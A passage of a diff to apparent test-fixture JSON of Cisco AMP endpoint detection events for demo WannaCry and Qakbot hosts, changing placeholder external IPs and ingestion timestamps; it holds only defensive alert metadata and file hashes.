"2021-12-09T13:35:39.764116300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":426000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4094,7 +4094,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -4157,7 +4157,7 @@ "e889544aff85ffaf8b0d0da705105dee7c97fe26" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4174,8 +4174,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025318355Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":399000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "ingested": "2021-12-09T13:35:39.764122900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":399000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4197,7 +4197,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -4234,7 +4234,7 @@ "Demo_Qakbot_3" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4244,8 +4244,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:14:44.025320596Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662859016176000,\"timestamp\":1610651432,\"timestamp_nanoseconds\":199000000,\"date\":\"2021-01-14T19:10:32+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "ingested": "2021-12-09T13:35:39.764129Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662859016176000,\"timestamp\":1610651432,\"timestamp_nanoseconds\":199000000,\"date\":\"2021-01-14T19:10:32+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", "action": "Policy Update", @@ -4262,7 +4262,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -4290,7 +4290,7 @@ "Demo_Qakbot_3" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4300,8 +4300,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:14:44.025322840Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662854721208000,\"timestamp\":1610651431,\"timestamp_nanoseconds\":856000000,\"date\":\"2021-01-14T19:10:31+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "ingested": "2021-12-09T13:35:39.764151Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662854721208000,\"timestamp\":1610651431,\"timestamp_nanoseconds\":856000000,\"date\":\"2021-01-14T19:10:31+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", "action": "Policy Update", @@ -4318,7 +4318,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -4354,7 +4354,7 @@ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4364,8 +4364,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025325035Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":233000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:39.764178800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":233000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -4385,7 +4385,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4430,7 +4430,7 @@ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4440,8 +4440,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025327285Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:39.764184200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -4461,7 +4461,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4506,7 +4506,7 @@ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4516,8 +4516,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025329483Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:39.764190200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -4537,7 +4537,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4584,7 +4584,7 @@ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4598,8 +4598,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025331697Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"el2j9fcqj.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\el2j9fcqj.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:39.764196200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"el2j9fcqj.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\el2j9fcqj.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -4621,7 +4621,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4664,7 +4664,7 @@ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4678,8 +4678,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025333936Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:39.764201Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective 